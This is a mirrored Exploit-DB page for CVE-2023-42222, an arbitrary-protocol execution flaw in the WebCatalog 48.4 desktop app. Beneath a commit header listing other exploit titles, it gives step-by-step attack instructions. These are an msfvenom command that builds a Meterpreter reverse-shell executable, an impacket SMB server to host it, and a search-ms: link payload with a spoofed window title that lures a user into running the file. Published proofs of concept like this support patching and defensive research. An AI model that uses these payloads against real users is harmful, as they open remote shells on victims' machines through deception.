bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/remote/51765.txt
Exploit-DB 81ae91fdae DB: 2024-02-03 
14 changes to exploits/shellcodes/ghdb

Electrolink FM/DAB/TV Transmitter - Unauthenticated Remote DoS
Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter (Login Cookie) - Authentication Bypass
Electrolink FM/DAB/TV Transmitter (login.htm/mail.htm) - Credentials Disclosure
Electrolink FM/DAB/TV Transmitter - Pre-Auth MPFS Image Remote Code Execution
Electrolink FM/DAB/TV Transmitter - Remote Authentication Removal
TP-LINK TL-WR740N - Multiple HTML Injection
TP-Link TL-WR740N - UnAuthenticated Directory Transversal

Juniper-SRX-Firewalls&EX-switches - (PreAuth-RCE) (PoC)

mooSocial 3.1.8 - Cross-Site Scripting (XSS) on User Login Page

PCMan FTP Server 2.0 - 'pwd' Remote Buffer Overflow

WebCatalog 48.4 - Arbitrary Protocol Execution
2024-02-03 00:16:34 +00:00

40 lines
No EOL
1.6 KiB
Text
Raw Permalink Blame History

# Exploit Title: WebCatalog 48.4 - Arbitrary Protocol Execution
# Date: 9/27/2023
# Exploit Author: ItsSixtyN3in
# Vendor Homepage: https://webcatalog.io/en/
# Software Link: https://cdn-2.webcatalog.io/webcatalog/WebCatalog%20Setup%2052.3.0.exe
# Version: 48.4.0
# Tested on: Windows
# CVE : CVE-2023-42222
Vulnerability summary:
WebCatalog before version 48.8 calls the Electron shell.openExternal function without verifying that the URL is for an http or https resource. This vulnerability allows an attacker to potentially execute code through arbitrary protocols on the victims machine by having users sync pages with malicious URLs. The victim has to interact with the link, which can then enable an attacker to bypass security measures for malicious file delivery.
Exploit details:
- Create a reverse shell file.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe
- Host a reverse shell file (or otherwise) on your own SMB share using impacket (https://github.com/fortra/impacket/blob/master/examples/smbserver.py)
python3 smbserver.py Tools -smb2support
- Have the user sync a page with the payload as a renamed link
[Friendly Link](Search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title)
Payload:
search-ms://query=<FileName>&crumb=location\\<attackerIP>\<attackerSMBShare>&displayname=Spoofed%20Windows%20Title
Tobias Diehl
Security Consultant
OSCP, CRTO, CEH, PenTest+, AZ-500, SC-200/300
Pronouns: he/him
e-mail: tobias.diehl@bulletproofsi.com
Reference in a new issue View git blame Copy permalink